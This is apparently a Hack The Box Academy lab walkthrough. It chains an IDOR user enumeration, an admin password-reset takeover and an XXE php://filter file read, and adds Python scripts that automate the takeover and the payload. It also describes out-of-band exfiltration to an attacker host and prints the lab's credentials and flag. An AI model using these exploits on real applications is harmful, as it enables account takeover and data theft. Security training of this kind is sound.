WEB ATTACKS
OBJECTIVE: perform a web application penetration test for a software development company and test the latest build of their social networking web application.
Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'.
#walk the application with Dev Tools and identify potentially vulnerable fields
root@htb:~$ BROWSER > {targetSite:port}
username field: htb-student
password field: Academy_student!
...
* submit the expected user input
* found a password change page /settings.php
#perform source code review to understand how the profile page works
#identified a script where profiles are handled
root@htb:~$ BROWSER > {targetSite:port}/profile.php > CTRL+U
<script>
$(document).ready(function() {
fetch(`/api.php/user/${$.cookie("uid")}`, {
method: 'GET'
}).then(function(response) {
return response.json();
}).then(function(json) {
$("#full_name").html(json['full_name']);
$("#company").html(json['company']);
});
});
</script>
#identify potential IDOR on the /api.php/user/{uid} endpoint (the uid comes straight from a client-side cookie)
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
username field: htb-student
password field: Academy_student!
...
* submit the expected user input
BURP > Proxy
Request
...
GET /api.php/user/74 HTTP/1.1
Host: 94.237.59.180:34096
Accept: */*
Referer: http://94.237.59.180:34096/profile.php
Cookie: PHPSESSID=t39r96rhoepn03m1vkit9s1t6n; uid=74
BURP > Repeater
Request
...
GET /api.php/user/76 HTTP/1.1 //changed 74 to 76; any other number returns that user's profile
Host: 94.237.59.180:34096
Accept: */*
Referer: http://94.237.59.180:34096/profile.php
Cookie: PHPSESSID=t39r96rhoepn03m1vkit9s1t6n; uid=74 //the uid cookie is not checked against the path parameter, so the session's own identity is never enforced
#IDOR found
Response
...
HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 13:11:29 GMT
Server: Apache/2.4.41 (Ubuntu)
{"uid":"76","username":"d.lubin","full_name":"Deema Lubin","company":"Gorczany - Reilly"}
...
#identify users with privileges via enumeration
#confirm the record format with one manual request before scripting the enumeration
root@oco:~$ curl -s "http://94.237.59.180:34096/api.php/user/1"
{"uid":"1","username":"s.applewhite","full_name":"Samanta Applewhite","company":"Daniel Inc"}
...
#create an enumeration script
root@oco:~$ nano script.sh
#!/bin/bash
url="94.237.59.180:34096"
# the enumeration output below covers uid 1-100, so loop over that range
for i in {1..100}; do
    curl -s "http://$url/api.php/user/$i"
done
root@oco:~$ bash script.sh | grep -i "admin" --color=auto
# the API returns no trailing newline, so all records land on one line and grep prints the whole run; scan it for "Administrator"
{"uid":"1","username":"s.applewhite","full_name":"Samanta Applewhite","company":"Daniel Inc"}{"uid":"2","username":"a.sumner","full_name":"Ari Sumner","company":"Friesen Group"}{"uid":"3","username":"j.oshaughnessy","full_name":"Jeevan Oshaughnessy","company":"Jaskolski - Lang"}{"uid":"4","username":"r.trainor","full_name":"Riggs Trainor","company":"Beer, Daugherty and Lang"}{"uid":"5","username":"j.bigelow","full_name":"Jakari Bigelow","company":"Ritchie - Hettinger"}{"uid":"6","username":"k.windsor","full_name":"Kahlan Windsor","company":"Rutherford LLC"}{"uid":"7","username":"w.amador","full_name":"Whitley Amador","company":"Howell and Sons"}{"uid":"8","username":"k.parrett","full_name":"Kristie Parrett","company":"Raynor Inc"}{"uid":"9","username":"g.fetter","full_name":"Guiliana Fetter","company":"Mann - Doyle"}{"uid":"10","username":"h.chaudhry","full_name":"Huxton Chaudhry","company":"Volkman - Satterfield"}{"uid":"11","username":"c.hall","full_name":"Charlotte Hall","company":"Reichel - Tillman"}{"uid":"12","username":"z.mccurdy","full_name":"Zyon Mccurdy","company":"Wintheiser - Altenwerth"}{"uid":"13","username":"p.whitman","full_name":"Paula Whitman","company":"Rath Inc"}{"uid":"14","username":"z.soria","full_name":"Zackery Soria","company":"Altenwerth - Haag"}{"uid":"15","username":"b.moriarty","full_name":"Brandi Moriarty","company":"Veum - Bechtelar"}{"uid":"16","username":"z.burdette","full_name":"Zadie Burdette","company":"Jakubowski, Reichert and Champlin"}{"uid":"17","username":"s.mandujano","full_name":"Sofi Mandujano","company":"Lind - Schiller"}{"uid":"18","username":"e.mohammad","full_name":"Emiyah Mohammad","company":"Jones - Stanton"}{"uid":"19","username":"d.tyndall","full_name":"Dottie Tyndall","company":"Hauck Inc"}{"uid":"20","username":"k.felice","full_name":"Kendalynn Felice","company":"Gislason, Grant and Beatty"}{"uid":"21","username":"r.tseng","full_name":"Rianna Tseng","company":"West - 
Lakin"}{"uid":"22","username":"k.deleon","full_name":"Kameron Deleon","company":"Muller - Bogisich"}{"uid":"23","username":"r.galloway","full_name":"Raven Galloway","company":"Hermann, Ankunding and Beier"}{"uid":"24","username":"d.lira","full_name":"Demarion Lira","company":"Stoltenberg - Hodkiewicz"}{"uid":"25","username":"m.mcatee","full_name":"Monet Mcatee","company":"Lubowitz, Schoen and Barrows"}{"uid":"26","username":"n.mcfadden","full_name":"Nasir Mcfadden","company":"Crooks - Kub"}{"uid":"27","username":"b.collett","full_name":"Braelyn Collett","company":"Lakin Inc"}{"uid":"28","username":"f.lara","full_name":"Felix Lara","company":"Hayes, Koelpin and Murazik"}{"uid":"29","username":"a.arneson","full_name":"Airam Arneson","company":"Osinski, Sawayn and West"}{"uid":"30","username":"k.wilkerson","full_name":"Kamila Wilkerson","company":"Brown, Willms and Quitzon"}{"uid":"31","username":"a.nations","full_name":"Aadvik Nations","company":"Jakubowski - Medhurst"}{"uid":"32","username":"a.bustillos","full_name":"Anabell Bustillos","company":"Hamill Group"}{"uid":"33","username":"a.zelaya","full_name":"Amani Zelaya","company":"Huel, Kris and Considine"}{"uid":"34","username":"a.mobley","full_name":"Alena Mobley","company":"Bayer - Tromp"}{"uid":"35","username":"j.triplett","full_name":"Javon Triplett","company":"Lehner - Dietrich"}{"uid":"36","username":"b.worthy","full_name":"Brentlee Worthy","company":"Brakus Group"}{"uid":"37","username":"l.hammons","full_name":"Letty Hammons","company":"Bogisich, Purdy and Rogahn"}{"uid":"38","username":"s.mcauley","full_name":"Steel Mcauley","company":"Cummerata and Sons"}{"uid":"39","username":"o.powe","full_name":"Oumou Powe","company":"Parker, Feeney and Buckridge"}{"uid":"40","username":"c.cogan","full_name":"Clarisa Cogan","company":"Rohan, Johnson and Flatley"}{"uid":"41","username":"r.goings","full_name":"Ram Goings","company":"Jacobson, Kertzmann and Jacobi"}{"uid":"42","username":"a.yin","full_name":"Asaad 
Yin","company":"Leuschke, Klocko and Bruen"}{"uid":"43","username":"j.rosenberger","full_name":"Jean Rosenberger","company":"Morar, Schuster and Johns"}{"uid":"44","username":"p.klein","full_name":"Paul Klein","company":"Kautzer, Connelly and McKenzie"}{"uid":"45","username":"n.cochrane","full_name":"Nehemias Cochrane","company":"Osinski, Haag and Conn"}{"uid":"46","username":"j.rigsby","full_name":"Jalissa Rigsby","company":"Ward - O'Kon"}{"uid":"47","username":"t.fairchild","full_name":"Toni Fairchild","company":"Bergnaum - Stiedemann"}{"uid":"48","username":"k.ambrosio","full_name":"Katai Ambrosio","company":"Borer Inc"}{"uid":"49","username":"m.hunnicutt","full_name":"Marty Hunnicutt","company":"Glover - Russel"}{"uid":"50","username":"r.raby","full_name":"Rafaela Raby","company":"Okuneva - Mayert"}{"uid":"51","username":"a.batres","full_name":"Abir Batres","company":"Rosenbaum LLC"}{"uid":"52","username":"a.corrales","full_name":"Amor Corrales","company":"Administrator"}{"uid":"53","username":"n.downs","full_name":"Nico Downs","company":"Welch, Collier and Gulgowski"}{"uid":"54","username":"d.holcomb","full_name":"Darren Holcomb","company":"Reynolds, Keebler and Lindgren"}{"uid":"55","username":"j.holmberg","full_name":"Jayliana Holmberg","company":"Haag - Douglas"}{"uid":"56","username":"i.durbin","full_name":"Isabell Durbin","company":"Goyette - Mraz"}{"uid":"57","username":"d.mcgee","full_name":"Daisy Mcgee","company":"Rodriguez, Windler and Hartmann"}{"uid":"58","username":"d.jumper","full_name":"Darek Jumper","company":"Kihn, Hickle and Wilderman"}{"uid":"59","username":"e.mckinzie","full_name":"Emre Mckinzie","company":"Heathcote - Bechtelar"}{"uid":"60","username":"c.paz","full_name":"Camron Paz","company":"Bernier, Stamm and Ankunding"}{"uid":"61","username":"s.shiver","full_name":"Siana Shiver","company":"Bernhard, Jerde and Bashirian"}{"uid":"62","username":"a.lankford","full_name":"Ayvah Lankford","company":"Oberbrunner, Wyman and 
Ledner"}{"uid":"63","username":"k.flint","full_name":"Khalid Flint","company":"Halvorson Inc"}{"uid":"64","username":"r.kozlowski","full_name":"Rome Kozlowski","company":"Lubowitz - Leannon"}{"uid":"65","username":"r.wellman","full_name":"Renesmee Wellman","company":"Bernhard and Sons"}{"uid":"66","username":"e.canady","full_name":"Emrie Canady","company":"Bashirian - Medhurst"}{"uid":"67","username":"r.kwon","full_name":"Roselynn Kwon","company":"Schimmel - Jakubowski"}{"uid":"68","username":"k.zarate","full_name":"Karmen Zarate","company":"Shanahan Group"}{"uid":"69","username":"h.farlow","full_name":"Hisham Farlow","company":"Lockman Group"}{"uid":"70","username":"m.urias","full_name":"Malika Urias","company":"Willms LLC"}{"uid":"71","username":"m.farrington","full_name":"Micaiah Farrington","company":"Legros - Schulist"}{"uid":"72","username":"a.tolman","full_name":"Anand Tolman","company":"Schamberger and Sons"}{"uid":"73","username":"s.nutt","full_name":"Sequoia Nutt","company":"Wiza - Abernathy"}{"uid":"74","username":"htb-student","full_name":"Paolo Perrone","company":"Schaefer Inc"}{"uid":"75","username":"h.ray","full_name":"Harrison Ray","company":"Satterfield, Schultz and Kemmer"}{"uid":"76","username":"d.lubin","full_name":"Deema Lubin","company":"Gorczany - Reilly"}{"uid":"77","username":"t.banner","full_name":"Tierney Banner","company":"Bartoletti - Gaylord"}{"uid":"78","username":"o.bear","full_name":"Olivier Bear","company":"Barton - O'Reilly"}{"uid":"79","username":"c.mathieu","full_name":"Cyril Mathieu","company":"Ebert Group"}{"uid":"80","username":"b.landry","full_name":"Bethany Landry","company":"Kertzmann - Reynolds"}{"uid":"81","username":"k.enoch","full_name":"Kiefer Enoch","company":"Hermiston, Koelpin and Bode"}{"uid":"82","username":"a.kang","full_name":"Allan Kang","company":"Purdy Group"}{"uid":"83","username":"z.hollon","full_name":"Zakhi Hollon","company":"Waelchi Group"}{"uid":"84","username":"r.deboer","full_name":"Randi 
Deboer","company":"McKenzie Inc"}{"uid":"85","username":"s.reichert","full_name":"Sanaya Reichert","company":"Howell and Sons"}{"uid":"86","username":"r.ewing","full_name":"Remi Ewing","company":"Deckow LLC"}{"uid":"87","username":"b.delatorre","full_name":"Brodie Delatorre","company":"Larkin LLC"}{"uid":"88","username":"e.hagen","full_name":"Eddie Hagen","company":"Murphy - Hansen"}{"uid":"89","username":"m.stock","full_name":"Marcello Stock","company":"Satterfield, Marquardt and Oberbrunner"}{"uid":"90","username":"z.recinos","full_name":"Zian Recinos","company":"Renner and Sons"}{"uid":"91","username":"j.breuer","full_name":"Jabria Breuer","company":"Kulas - Stokes"}{"uid":"92","username":"n.andrus","full_name":"Nazir Andrus","company":"Jakubowski - Price"}{"uid":"93","username":"t.olivarez","full_name":"Teo Olivarez","company":"Rempel, Larson and Zieme"}{"uid":"94","username":"m.player","full_name":"Majd Player","company":"Miller, Wisoky and O'Reilly"}{"uid":"95","username":"o.alverson","full_name":"Ousmane Alverson","company":"Bartell - Gorczany"}{"uid":"96","username":"j.jewett","full_name":"Jazmyne Jewett","company":"Cruickshank, McLaughlin and Barton"}{"uid":"97","username":"b.mccallister","full_name":"Blayne Mccallister","company":"Emmerich and Sons"}{"uid":"98","username":"e.amoroso","full_name":"Ellyn Amoroso","company":"Simonis, Roob and Cassin"}{"uid":"99","username":"j.orcutt","full_name":"Jayana Orcutt","company":"Fritsch, Murray and Reinger"}{"uid":"100","username":"e.harder","full_name":"Ester Harder","company":"Rau Inc"}
...
# isolate the matching record: -o prints only the part of the line that matches, bounded by the record's braces
root@oco:~$ bash script.sh | grep -o -i '{[^}]*admin[^}]*}'
{"uid":"52","username":"a.corrales","full_name":"Amor Corrales","company":"Administrator"}
#identify a way to change the password for the admin account
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > Settings
password: {arbitraryValue}
confirm password: {arbitraryValue}
* submit expected input
BURP > Proxy
Request
...
GET /api.php/token/52 HTTP/1.1
Host: 94.237.63.176:42682
Referer: http://94.237.63.176:42682/settings.php
Cookie: PHPSESSID=jkl79tu8srt60aofrnt2fhmkok; uid=52
Response
...
HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 03:06:11 GMT
Server: Apache/2.4.41 (Ubuntu)
{"token":"e51a85fa-17ac-11ec-8e51-e78234eb7b0c"}
#change the admin account's password
root@oco:~$ BROWSER > {targetSite:port} > Settings
BURP > Proxy
Request
...
GET /api.php/user/52 HTTP/1.1 //changed from 74 to 52
Host: 94.237.59.180:34096
Accept: */*
Referer: http://94.237.59.180:34096/profile.php
Cookie: PHPSESSID=t39r96rhoepn03m1vkit9s1t6n; uid=74
* Forward the request to access the admin's profile page
- click settings and change the admin's password
- password: {arbitraryValue}
confirm password: {arbitraryValue}
* Submit changed password
Burp > Proxy
Request
...
GET /api.php/token/52 HTTP/1.1
Host: 94.237.63.176:35991
Accept: */*
Referer: http://94.237.63.176:35991/settings.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=74
* Forward request
BURP > Proxy
Request
...
POST /reset.php HTTP/1.1
Host: 94.237.63.176:35991
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/settings.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=74
uid=74&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=password
* right-click on this request and select "Change request method" (POST becomes GET with the parameters in the query string; the reset endpoint accepts it either way)
Burp > Proxy
Request
...
GET /reset.php?uid=52&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=password HTTP/1.1
Host: 94.237.63.176:35991
Accept: */*
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/settings.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=74
Response
...
Password changed successfully
* ensure the uid is 52 and the token is the one returned by /api.php/token/52, i.e. the admin's reset token
#access the admin profile & take over the admin's account (or set the attacker's profile to admin)
root@oco:~$ BROWSER > {targetSite:port}
username: a.corrales
password: password
* submit changed password to access the admin's account
- privilege escalation achieved
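The whole IDOR chain above (enumerate /api.php/user/{uid}, spot the "Administrator" record, pull the victim's token from /api.php/token/{uid}, submit reset.php as a GET) as one script. This is an added example, not the page's own bash script and not part of the target application. It assumes the endpoint shapes and the "Password changed successfully" string seen in the Burp captures; the `fake_get` transport, its "Invalid token" answer and the four-record user table are constructed so the chain runs offline, and `http_get` is the drop-in replacement for a live target.

```python
import json
import urllib.parse
import urllib.request


def http_get(base_url, path, cookie=None):
    """Live transport: GET base_url + path and return (status, body).
    Only urllib is used; cookie is the raw Cookie header (the PHPSESSID of the low-privileged session)."""
    req = urllib.request.Request(base_url + path)
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode()


def enumerate_users(fetch, first=1, last=100):
    """Walk /api.php/user/{uid}. Because of the IDOR one session can read every
    record; non-200 or non-JSON answers are skipped instead of aborting the run."""
    users = []
    for uid in range(first, last + 1):
        status, body = fetch(f"/api.php/user/{uid}")
        if status != 200:
            continue
        try:
            users.append(json.loads(body))
        except json.JSONDecodeError:
            continue
    return users


def find_privileged(users, marker="administrator"):
    """Records whose fields mention the marker (the admin's company field read 'Administrator')."""
    return [u for u in users if any(marker in str(v).lower() for v in u.values())]


def take_over(fetch, uid, new_password):
    """Same IDOR on /api.php/token/{uid} hands over the victim's reset token; reset.php
    is then called as a GET (the verb change made in Burp). Returns (token, success)."""
    status, body = fetch(f"/api.php/token/{uid}")
    if status != 200:
        return None, False
    token = json.loads(body)["token"]
    query = urllib.parse.urlencode({"uid": uid, "token": token, "password": new_password})
    status, body = fetch(f"/reset.php?{query}")
    return token, "Password changed successfully" in body


# ---- constructed stand-in for the target so the chain runs offline (assumption) ----
# Four records copied from the enumeration output; the token is the one the notes
# show for uid 52. The 404 and "Invalid token" behaviour is invented for the fake.
FAKE_USERS = {
    1:  {"uid": "1",  "username": "s.applewhite", "full_name": "Samanta Applewhite", "company": "Daniel Inc"},
    52: {"uid": "52", "username": "a.corrales",   "full_name": "Amor Corrales",      "company": "Administrator"},
    74: {"uid": "74", "username": "htb-student",  "full_name": "Paolo Perrone",      "company": "Schaefer Inc"},
    76: {"uid": "76", "username": "d.lubin",      "full_name": "Deema Lubin",        "company": "Gorczany - Reilly"},
}
FAKE_TOKENS = {52: "e51a85fa-17ac-11ec-8e51-e78234eb7b0c"}


def fake_get(path):
    """Mimics the vulnerable API: no ownership check on user/{uid} or token/{uid}."""
    parsed = urllib.parse.urlsplit(path)
    parts = parsed.path.strip("/").split("/")
    if len(parts) == 3 and parts[0] == "api.php" and parts[2].isdigit():
        uid = int(parts[2])
        if parts[1] == "user" and uid in FAKE_USERS:
            return 200, json.dumps(FAKE_USERS[uid])
        if parts[1] == "token" and uid in FAKE_TOKENS:
            return 200, json.dumps({"token": FAKE_TOKENS[uid]})
    if parts == ["reset.php"]:
        q = dict(urllib.parse.parse_qsl(parsed.query))
        uid = int(q["uid"]) if q.get("uid", "").isdigit() else None
        if uid is not None and FAKE_TOKENS.get(uid) == q.get("token"):
            return 200, "Password changed successfully"
        return 200, "Invalid token"
    return 404, ""


if __name__ == "__main__":
    # live target: fetch = lambda p: http_get("http://HOST:PORT", p, "PHPSESSID=...")
    admins = find_privileged(enumerate_users(fake_get))
    print("privileged:", admins)
    print("takeover:", take_over(fake_get, int(admins[0]["uid"]), "password"))
```

The fix on the application side is the inverse of what `take_over` relies on: both `/api.php/user/{uid}` and `/api.php/token/{uid}` must compare the requested uid with the uid bound to the server-side session, and reset.php must not accept a uid/token pair for any account other than the one that asked for the token.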
#test the event feature: it sends XML to the server, so check it for XXE
BURP > Proxy
Request
...
GET /event.php HTTP/1.1
Host: 94.237.63.176:35991
Referer: http://94.237.63.176:35991/profile.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=52
* submit a test event
BURP > Proxy
Request
...
POST /addEvent.php HTTP/1.1
Host: 94.237.63.176:35991
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/event.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=52
<root>
<name>xxeEvent</name>
<details>xxeEvent</details>
<date>2025-01-15</date>
</root>
#identify which elements are reflected in the response in order to know where to inject the malicious XML entity
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
Request
...
POST /addEvent.php HTTP/1.1
Host: 94.237.63.176:35991
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/event.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=52
<root>
<name>xxeEvent</name>
<details>xxeEvent</details>
<date>2025-01-15</date>
</root>
Response
...
HTTP/1.1 200 OK
Event 'xxeEvent' has been created.
* the name element is reflected in the response, so it is the place to reference an entity
#test error-based xxe
BURP > Repeater
Request
...
<root>
<name>&nonExistingEntity;</name>
<details>xxeEvent</details>
<date>2025-01-15</date>
</root>
Response
...
HTTP/1.1 200 OK
Event '' has been created.
* the undefined entity expands to nothing and no error is displayed, so error-based XXE gives no feedback here
* if the web application displayed a parser error, it could reveal the web server directory, which can be used to read the source code of other files
* ALT: break the document by removing a closing tag (e.g. </roo> instead of </root>) to provoke a parser error
#execution
#read the source code through the PHP filter wrapper, reflected in the name element
BURP > Repeater
Request
...
POST /addEvent.php HTTP/1.1
Host: 94.237.63.176:35991
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/event.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=52
<!DOCTYPE email [
<!ENTITY srcCode SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">
]>
<root>
<name>&srcCode;</name>
<details>xxeEvent</details>
<date>2025-01-15</date>
</root>
* Send the request
Response
...
HTTP/1.1 200 OK
Event 'PD9waHAgJGZsYWcgPSAiSFRCe200NTczcl93M2JfNDc3NGNrM3J9IjsgPz4K' has been created.
* step-by-step process
- The DOCTYPE declares an external general entity srcCode whose SYSTEM identifier is the PHP stream wrapper
php://filter/convert.base64-encode/resource=/flag.php. When the server-side XML parser resolves entities,
it opens that stream, which reads /flag.php and Base64-encodes its content.
- The entity is referenced inside <name>, and addEvent.php echoes the name back in
"Event '...' has been created.", so the encoded file lands directly in the response (in-band XXE).
Base64 is used because the raw PHP source contains <, ? and quote characters that would break
the XML document or be interpreted by the parser instead of being returned verbatim.
- If nothing were reflected, the blind out-of-band variant would be needed instead: a parameter entity
%file holding the Base64-encoded content, and a second entity %oob that makes the parser request
http://OUR_IP:8000/?content=%file; so the parser itself sends the data to the attacker's listener as
the content query parameter. That variant is not required here because the name field is reflected.
root@oco:~$ echo -n "PD9waHAgJGZsYWcgPSAiSFRCe200NTczcl93M2JfNDc3NGNrM3J9IjsgPz4K" | base64 -d
* <?php $flag = "HTB{m4573r_w3b_4774ck3r}"; ?>
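The XXE step above as an added, self-contained model: building the payload that goes into <name>, a toy of what the server does when entity substitution is on (the behaviour observed: undeclared entity expands to '' with no error, declared SYSTEM entity is expanded and reflected), the hardened counterpart, and the decode of the reflected value. This is example code, not addEvent.php and not part of the page's original notes; the in-memory "filesystem", the regex-based parser model and the "Error: DTD not allowed" response are assumptions, and the flag content is the decoded value shown above.

```python
import base64
import binascii
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"([^"]+)"\s*>')
ENTITY_REF = re.compile(r"&(\w+);")
B64_FILTER = "php://filter/convert.base64-encode/resource="


def build_payload(path, entity="srcCode"):
    """The in-band XXE body for addEvent.php: the external entity is referenced in
    <name>, the only element the response reflects. The base64 filter keeps the
    target file's own <, ? and quote characters from breaking the XML document."""
    return (
        f'<!DOCTYPE email [\n'
        f'<!ENTITY {entity} SYSTEM "{B64_FILTER}{path}">\n'
        f']>\n'
        f'<root>\n<name>&{entity};</name>\n<details>xxeEvent</details>\n'
        f'<date>2025-01-15</date>\n</root>'
    )


def extract_reflected(response_body):
    """Pull the name value out of "Event '...' has been created." and Base64-decode it.
    Returns the raw value when it is not Base64 (e.g. a plain 'xxeEvent' probe)."""
    m = re.search(r"Event '(.*?)' has been created\.", response_body, re.S)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return m.group(1)


# ---- toy model of the server side (assumption, not the real addEvent.php) -----------
# Simulates a parser with entity substitution enabled (PHP's LIBXML_NOENT) over a
# constructed in-memory filesystem.
def resolve_entity(system_id, fs):
    if system_id.startswith(B64_FILTER):
        data = fs.get(system_id[len(B64_FILTER):])
        return base64.b64encode(data.encode()).decode() if data is not None else ""
    return fs.get(system_id, "")


def vulnerable_add_event(xml, fs):
    entities = {name: resolve_entity(sys_id, fs) for name, sys_id in ENTITY_DECL.findall(xml)}
    m = re.search(r"<name>(.*?)</name>", xml, re.S)
    raw = m.group(1) if m else ""
    # Undeclared entities expand to nothing and raise no error (what the
    # &nonExistingEntity; probe showed), so error-based XXE gives no feedback.
    name = ENTITY_REF.sub(lambda r: entities.get(r.group(1), ""), raw)
    return f"Event '{name}' has been created."


def hardened_add_event(xml):
    """Fix: refuse any DTD, so no internal, external or parameter entity can be declared
    (in PHP terms: never pass LIBXML_NOENT, and reject documents carrying a DOCTYPE)."""
    if re.search(r"<!(DOCTYPE|ENTITY)", xml, re.I):
        return "Error: DTD not allowed"
    m = re.search(r"<name>(.*?)</name>", xml, re.S)
    return f"Event '{m.group(1) if m else ''}' has been created."


# constructed filesystem; the flag content is the decoded value from the notes
FAKE_FS = {"/flag.php": '<?php $flag = "HTB{m4573r_w3b_4774ck3r}"; ?>\n'}

if __name__ == "__main__":
    payload = build_payload("/flag.php")
    body = vulnerable_add_event(payload, FAKE_FS)
    print(body)
    print(extract_reflected(body))
    print(hardened_add_event(payload))
```

Against the live target the payload string from `build_payload` is what goes into the Repeater body and `extract_reflected` is applied to the HTTP response; the toy server only exists so the round trip can be checked without the lab.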